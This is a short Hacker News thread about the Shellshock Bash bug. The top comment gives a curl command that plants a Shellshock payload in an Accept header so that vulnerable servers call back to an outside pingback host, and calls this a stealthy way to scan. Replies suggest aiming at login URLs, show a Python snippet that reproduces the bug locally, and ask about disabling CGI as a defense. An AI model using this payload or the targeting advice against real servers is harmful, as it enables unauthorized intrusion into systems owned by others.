Hacker News new | ask | show | jobs
by gwillem 4282 days ago
This is quite stealthy way to scan, as Accept headers are generally not logged:

    curl -H 'Accept: () { :;}; /usr/bin/curl -so /dev/null http://my.pingback.com'
Found nothing so far though. IMHO the number of Bash CGI scripts in the wild must be pretty low.
3 comments
antocv 4282 days ago
Maybe the bash is invoked on some other request path, not just / which you are scanning.

I would go with /login and such, or write a crawler to parse out where the login/logout URLs are and try those.

link
dremel 4282 days ago
Would disabling CGI e.g. adding Option -ExecCIG to httpd.conf for Apache prevent exploitation via the web-server?
link
mr_brown 4282 days ago
import os os.putenv("ANYTHING", "() { :;}; echo bu") os.system("bash")

If this works (and it does) that means it's enough for a CGI script to invoke bash. It doesn't even have to be written in bash.

link